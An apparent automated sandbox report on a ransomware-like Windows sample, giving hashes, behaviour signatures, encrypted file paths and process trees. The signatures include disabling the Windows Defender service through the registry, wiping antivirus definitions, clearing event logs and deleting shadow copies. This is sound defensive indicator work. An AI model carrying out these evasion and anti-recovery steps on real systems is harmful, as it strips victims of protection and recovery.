Resubmissions
13-01-2022 14:14
220113-rj8ymsagb4 1013-01-2022 11:04
220113-m6crhahfgj 1013-01-2022 10:58
220113-m3a4hahef9 10Analysis
-
max time kernel
48s -
max time network
14s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-01-2022 11:04
Static task
static1
Behavioral task
behavioral1
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win10-en-20211208
General
-
Target
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
-
Size
2.5MB
-
MD5
8fdfa1997b566f6e086c29e33935dcc5
-
SHA1
178fbe1c8fc1a6e3440215d668797699f94a4bef
-
SHA256
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
-
SHA512
b185d1080c62f59ff26592321bf2a5cb85556260f34f59726cc9d5aeed1f82a48c710e8decd1212ddc2e4ca371ba83ad3aca6bf34587ddc73cc9c90afec467d5
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1824 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exedescription ioc process File opened for modification C:\Program Files\Common Files\System\ado\msado28.tlb cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_sK9Z6uVqgCA0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_ktQG2gupiNg0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_wzbAmmSTcUc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_MhONk5VDv180.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_HYlCkFtTUwI0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_5CMJabjKdpM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_irmsRX9qs740.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_q81bQfQ2f1Y0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NoEGqOHMJWk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\7z.sfx.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_cwXQgAQAQfI0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop_PAL.wmv cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground.wmv cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_BlfwRvA2pzs0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_VipML3zsbvg0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_kpWy3fnCXck0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_eLG0CqoMiTA0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_hN6tnWzTRKA0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_ywVQAU2fjic0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg_sml.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\picturePuzzle.css cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_4oAyxzhVM1g0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_n4jsJOo2n8k0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NugW263pHY40.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318804.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_LntGZXJ11zc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Bwbzt3M7wMw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_WUEr4Y1hm8Y0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_fE2zslmI26w0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipTsf.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_uf0jDBkID040.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_Off.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_6_Z3hoH2DiM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_LeKKP-R4cPM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_sMANohA3BTY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_z3Qsr1ZexBk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_urNWfzniZow0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_rfnb0gdSkok0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PIXEL\THMBNAIL.PNG.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_bOvj6YDEwaI0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105412.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_vBYlIJuWoGY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Ksfl8zQYAyQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_yC8Io2umc9c0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_qnbAWbrVUAU0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_uniYPXU4nnQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NEKuOA9cTA40.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_xcOR5JuLIaI0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonIcon.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Tn8rNgR3ZQk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_wqyP41r4tuQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\MSTAG.TLB.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_tU27Jl307qQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1328 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.execab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exepid process 1376 powershell.exe 972 powershell.exe 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 700 wevtutil.exe Token: SeBackupPrivilege 700 wevtutil.exe Token: SeSecurityPrivilege 1768 wevtutil.exe Token: SeBackupPrivilege 1768 wevtutil.exe Token: SeSecurityPrivilege 472 wevtutil.exe Token: SeBackupPrivilege 472 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1776 wmic.exe Token: SeSecurityPrivilege 1776 wmic.exe Token: SeTakeOwnershipPrivilege 1776 wmic.exe Token: SeLoadDriverPrivilege 1776 wmic.exe Token: SeSystemProfilePrivilege 1776 wmic.exe Token: SeSystemtimePrivilege 1776 wmic.exe Token: SeProfSingleProcessPrivilege 1776 wmic.exe Token: SeIncBasePriorityPrivilege 1776 wmic.exe Token: SeCreatePagefilePrivilege 1776 wmic.exe Token: SeBackupPrivilege 1776 wmic.exe Token: SeRestorePrivilege 1776 wmic.exe Token: SeShutdownPrivilege 1776 wmic.exe Token: SeDebugPrivilege 1776 wmic.exe Token: SeSystemEnvironmentPrivilege 1776 wmic.exe Token: SeRemoteShutdownPrivilege 1776 wmic.exe Token: SeUndockPrivilege 1776 wmic.exe Token: SeManageVolumePrivilege 1776 wmic.exe Token: 33 1776 wmic.exe Token: 34 1776 wmic.exe Token: 35 1776 wmic.exe Token: SeIncreaseQuotaPrivilege 1076 wmic.exe Token: SeSecurityPrivilege 1076 wmic.exe Token: SeTakeOwnershipPrivilege 1076 wmic.exe Token: SeLoadDriverPrivilege 1076 wmic.exe Token: SeSystemProfilePrivilege 1076 wmic.exe Token: SeSystemtimePrivilege 1076 wmic.exe Token: SeProfSingleProcessPrivilege 1076 wmic.exe Token: SeIncBasePriorityPrivilege 1076 wmic.exe Token: SeCreatePagefilePrivilege 1076 wmic.exe Token: SeBackupPrivilege 1076 wmic.exe Token: SeRestorePrivilege 1076 wmic.exe Token: SeShutdownPrivilege 1076 wmic.exe Token: SeDebugPrivilege 1076 wmic.exe Token: SeSystemEnvironmentPrivilege 1076 wmic.exe Token: SeRemoteShutdownPrivilege 1076 wmic.exe Token: SeUndockPrivilege 1076 wmic.exe Token: SeManageVolumePrivilege 1076 wmic.exe Token: 33 1076 wmic.exe Token: 34 1076 wmic.exe Token: 35 1076 wmic.exe Token: SeIncreaseQuotaPrivilege 1076 wmic.exe Token: SeSecurityPrivilege 1076 wmic.exe Token: SeTakeOwnershipPrivilege 1076 wmic.exe Token: SeLoadDriverPrivilege 1076 wmic.exe Token: SeSystemProfilePrivilege 1076 wmic.exe Token: SeSystemtimePrivilege 1076 wmic.exe Token: SeProfSingleProcessPrivilege 1076 wmic.exe Token: SeIncBasePriorityPrivilege 1076 wmic.exe Token: SeCreatePagefilePrivilege 1076 wmic.exe Token: SeBackupPrivilege 1076 wmic.exe Token: SeRestorePrivilege 1076 wmic.exe Token: SeShutdownPrivilege 1076 wmic.exe Token: SeDebugPrivilege 1076 wmic.exe Token: SeSystemEnvironmentPrivilege 1076 wmic.exe Token: SeRemoteShutdownPrivilege 1076 wmic.exe Token: SeUndockPrivilege 1076 wmic.exe Token: SeManageVolumePrivilege 1076 wmic.exe Token: 33 1076 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1916 wrote to memory of 672 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 672 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 672 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 672 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 672 wrote to memory of 584 672 net.exe net1.exe PID 672 wrote to memory of 584 672 net.exe net1.exe PID 672 wrote to memory of 584 672 net.exe net1.exe PID 672 wrote to memory of 584 672 net.exe net1.exe PID 1916 wrote to memory of 1492 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1492 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1492 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1492 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1492 wrote to memory of 1364 1492 net.exe net1.exe PID 1492 wrote to memory of 1364 1492 net.exe net1.exe PID 1492 wrote to memory of 1364 1492 net.exe net1.exe PID 1492 wrote to memory of 1364 1492 net.exe net1.exe PID 1916 wrote to memory of 1852 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1852 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1852 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1852 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1852 wrote to memory of 1116 1852 net.exe net1.exe PID 1852 wrote to memory of 1116 1852 net.exe net1.exe PID 1852 wrote to memory of 1116 1852 net.exe net1.exe PID 1852 wrote to memory of 1116 1852 net.exe net1.exe PID 1916 wrote to memory of 900 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 900 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 900 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 900 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 900 wrote to memory of 1120 900 net.exe net1.exe PID 900 wrote to memory of 1120 900 net.exe net1.exe PID 900 wrote to memory of 1120 900 net.exe net1.exe PID 900 wrote to memory of 1120 900 net.exe net1.exe PID 1916 wrote to memory of 436 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 436 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 436 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 436 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 436 wrote to memory of 1200 436 net.exe net1.exe PID 436 wrote to memory of 1200 436 net.exe net1.exe PID 436 wrote to memory of 1200 436 net.exe net1.exe PID 436 wrote to memory of 1200 436 net.exe net1.exe PID 1916 wrote to memory of 1216 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1216 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1216 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1216 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1216 wrote to memory of 676 1216 net.exe net1.exe PID 1216 wrote to memory of 676 1216 net.exe net1.exe PID 1216 wrote to memory of 676 1216 net.exe net1.exe PID 1216 wrote to memory of 676 1216 net.exe net1.exe PID 1916 wrote to memory of 1904 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1904 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1904 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 1904 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1904 wrote to memory of 1660 1904 net.exe net1.exe PID 1904 wrote to memory of 1660 1904 net.exe net1.exe PID 1904 wrote to memory of 1660 1904 net.exe net1.exe PID 1904 wrote to memory of 1660 1904 net.exe net1.exe PID 1916 wrote to memory of 632 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 632 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 632 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1916 wrote to memory of 632 1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 632 wrote to memory of 1148 632 net.exe net1.exe PID 632 wrote to memory of 1148 632 net.exe net1.exe PID 632 wrote 